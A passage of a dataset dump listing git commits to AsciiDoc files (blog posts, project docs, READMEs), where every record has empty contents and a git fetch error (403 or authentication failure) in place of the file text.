requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a06ba3c77223e5c78468c058a3de79911b413ddc","subject":"Update 2018-07-13-I-will-be-Vimmer.adoc","message":"Update 2018-07-13-I-will-be-Vimmer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a35fa6356e9bafb7d180920177af56b327efd179","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ab999eda3775fe2a2a3ff7aa0111af2e127c956","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"420acbf76903124d006d9d4f48312886b62386ae","subject":"y2b create post It's Not What It Looks Like...","message":"y2b create post It's Not What It Looks Like...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-29-Its-Not-What-It-Looks-Like.adoc","new_file":"_posts\/2017-01-29-Its-Not-What-It-Looks-Like.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"353e7d0d26db4ea5e76f7c60f0e24ee0609eebb4","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f52587064815e1c7f769e9e046efa3443e7897","subject":"[DOC] Adding version compatibility matrix for Spark in installation documentation.","message":"[DOC] Adding version compatibility matrix for Spark in installation documentation.\n\nfixes #890\n","repos":"elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/intro\/download.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/intro\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3766a25db820e3186ff154f073c9d9e1cee84df0","subject":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","message":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98ea0ff4f0d5c37ffb54ab4b178907e47cc1635c","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"399f0cb740a931a159071d2cf1afb294fa14dd7f","subject":"y2b create post PlayStation 4 - Flip Screen Edition!","message":"y2b create post PlayStation 4 - Flip Screen Edition!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-02-PlayStation-4--Flip-Screen-Edition.adoc","new_file":"_posts\/2016-10-02-PlayStation-4--Flip-Screen-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8558c5ba1030d5d9dd7350b332fb974a7194c865","subject":"Changes to work around broken manual placed TOC rendering.","message":"Changes to work around broken manual placed TOC rendering.\n","repos":"ForensicArtifacts\/artifacts,pstirparo\/artifacts,Onager\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc6e4d6951a1f5effdfd0cf359ab8b7215b82197","subject":"Update 2017-04-28-Spaziergangeristik.adoc","message":"Update 2017-04-28-Spaziergangeristik.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-28-Spaziergangeristik.adoc","new_file":"_posts\/2017-04-28-Spaziergangeristik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2143920e6a98a88f9a1e2c31d7dca052dadd2a9d","subject":"doc: implementers-guide: update section on skipping tests","message":"doc: implementers-guide: update section on skipping tests\n\nUpdate sections describing how a specific platform may skip tests by\nmarking them as inactive.\n\nSigned-off-by: Stuart Haslam <1fce01f364ef5298e64e07a42e08efeef153fa98@linaro.org>\nReviewed-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"kalray\/odp-mppa,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,kalray\/odp-mppa,ravineet-singh\/odp,dkrot\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,rsalveti\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,erachmi\/odp,dkrot\/odp,kalray\/odp-mppa,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,erachmi\/odp,rsalveti\/odp,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,kalray\/odp-mppa","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a6ba6d5dbd2265b008112b9549b6853f9a314ede","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6abebc206cc83eccdb33cce2f4e81ed4eb63c8","subject":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa1a5797e60390159de864d169b7f095c2d5fa04","subject":"Created Home (asciidoc)","message":"Created Home (asciidoc)","repos":"ehcache\/ehcache3,ljacomet\/ehcache3,cschanck\/ehcache3,albinsuresh\/ehcache3,jhouserizer\/ehcache3,GaryWKeim\/ehcache3,rkavanap\/ehcache3,jhouserizer\/ehcache3,ljacomet\/ehcache3,henri-tremblay\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,chrisdennis\/ehcache3,AbfrmBlr\/ehcache3,rkavanap\/ehcache3,lorban\/ehcache3,albinsuresh\/ehcache3,cljohnso\/ehcache3,lorban\/ehcache3,GaryWKeim\/ehcache3,chrisdennis\/ehcache3,alexsnaps\/ehcache3,cschanck\/ehcache3,AbfrmBlr\/ehcache3,aurbroszniowski\/ehcache3,ehcache\/ehcache3","old_file":"Home.asciidoc","new_file":"Home.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce52567f5a490bed57be47d520e889f043cc1058","subject":"Update 2016-07-08-title.adoc","message":"Update 2016-07-08-title.adoc","repos":"btsibr\/myhubpress,btsibr\/myhubpress,btsibr\/myhubpress,btsibr\/myhubpress","old_file":"_posts\/2016-07-08-title.adoc","new_file":"_posts\/2016-07-08-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/btsibr\/myhubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f9fca34496ca40a22965b7c955221f578305c2b","subject":"y2b create post 4 Unique iPhone Accessories","message":"y2b create post 4 Unique iPhone Accessories","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-4%20Unique%20iPhone%20Accessories.adoc","new_file":"_posts\/2017-12-01-4%20Unique%20iPhone%20Accessories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed20291aade4856577d776b7c7772cf67b4bc5a2","subject":"doc: userguide: add descriptions of new packet manipulation APIs","message":"doc: userguide: add descriptions of new packet manipulation APIs\n\nAdd documentation of new packet manipulation APIs added for Monarch\nincluding:\n\nodp_packet_add_data()\nodp_packet_align()\nodp_packet_concat()\nodp_packet_copy_data()\nodp_packet_copy_from_mem()\nodp_packet_copy_from_pkt()\nodp_packet_copy_part()\nodp_packet_copy_to_mem()\nodp_packet_move_data()\nodp_packet_rem_data()\nodp_packet_split()\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,erachmi\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,ravineet-singh\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,ravineet-singh\/odp","old_file":"doc\/users-guide\/users-guide-packet.adoc","new_file":"doc\/users-guide\/users-guide-packet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fe6c4d589c2e3640c12840e09e16db2a13710c8d","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b65132ee802a7b47ff5d93a89cfa8eb59838e1c5","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50f7b1497acc74863352dcc770d6fc6d12b7523e","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc3cf5135b55116613cbd9ca4c79d3e3c87415bb","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"373c7da605fc500e4b7e045a943e49a9346a9714","subject":"Update 2016-12-06-problem-solving-algorithm-intermediate01.adoc","message":"Update 2016-12-06-problem-solving-algorithm-intermediate01.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate01.adoc","new_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b2557084cc52b259d23be3e18d77b1b12affe49","subject":"Update 2017-01-03-Solving-the-twitter-monetization-problem.adoc","message":"Update 2017-01-03-Solving-the-twitter-monetization-problem.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-03-Solving-the-twitter-monetization-problem.adoc","new_file":"_posts\/2017-01-03-Solving-the-twitter-monetization-problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e6b7dd6316d987bbdf2b9f4dde318fd0b31efb1","subject":"Update 2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","message":"Update 2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","new_file":"_posts\/2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"130fcb8089af840447ad2955bcb606ace849f288","subject":"Update 2015-06-18-Hello-Word.adoc","message":"Update 2015-06-18-Hello-Word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-Hello-Word.adoc","new_file":"_posts\/2015-06-18-Hello-Word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ebcf717dcf7af6bad6d1d278cee3b126a88f15e","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc\n\nchage alt title","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86a7903465b07907c573eb5298fbd32795d514ab","subject":"Update 2016-07-21-2016-07-21.adoc","message":"Update 2016-07-21-2016-07-21.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-21-2016-07-21.adoc","new_file":"_posts\/2016-07-21-2016-07-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0bb45c46de7abaced0ecb8e5922066512156d78","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe157fda245938cf9452501981d0ff9b0e2241a3","subject":"Clean post error","message":"Clean post error","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f086218e3d76a41e33c35d78459ae18a14bf4b1","subject":"Update 2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","message":"Update 2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","new_file":"_posts\/2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e9e369f85e9dcd727ed8d60a42fbcc572889a84","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0044f05d5857d1af015d96157edaab6307663d4","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cbc139343fe5c2d3c17871df9eb0e0bed5c1c15","subject":"adjust image size","message":"adjust image size\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bea71d2f9f5ba29a6d1c229a24b7e3c5ed31520","subject":"Include instruction doesn't work, github run Asciidoc in safe mode only","message":"Include instruction doesn't work, github run Asciidoc in safe mode only\n\nSwitch from include to a link for `usage.txt`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50fab74e51a54637233f0707ed30af9d3560120b","subject":"y2b create post A Speaker In An Ammo Box?","message":"y2b create post A Speaker In An Ammo Box?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-28-A-Speaker-In-An-Ammo-Box.adoc","new_file":"_posts\/2016-01-28-A-Speaker-In-An-Ammo-Box.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c5636292d15030b306bbd0b207dfc272aef8092","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74ac02b6cc4b9ea89a9ecb1a29933d8bd3184dfc","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56706aab7a9080e9636f65d87bbb8d6e86877b2e","subject":"job: #12065 draft analysis of interfacing to iSim","message":"job: #12065 draft analysis of interfacing to iSim\n","repos":"keithbrown\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12065_isim2\/12065_isim_ant.adoc","new_file":"doc-bridgepoint\/notes\/12065_isim2\/12065_isim_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b0e797d1917f610bde7b9f697db7c4a38beac68b","subject":"Add loadbalancer entries and openstack command to README","message":"Add loadbalancer entries and openstack command to README\n","repos":"redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 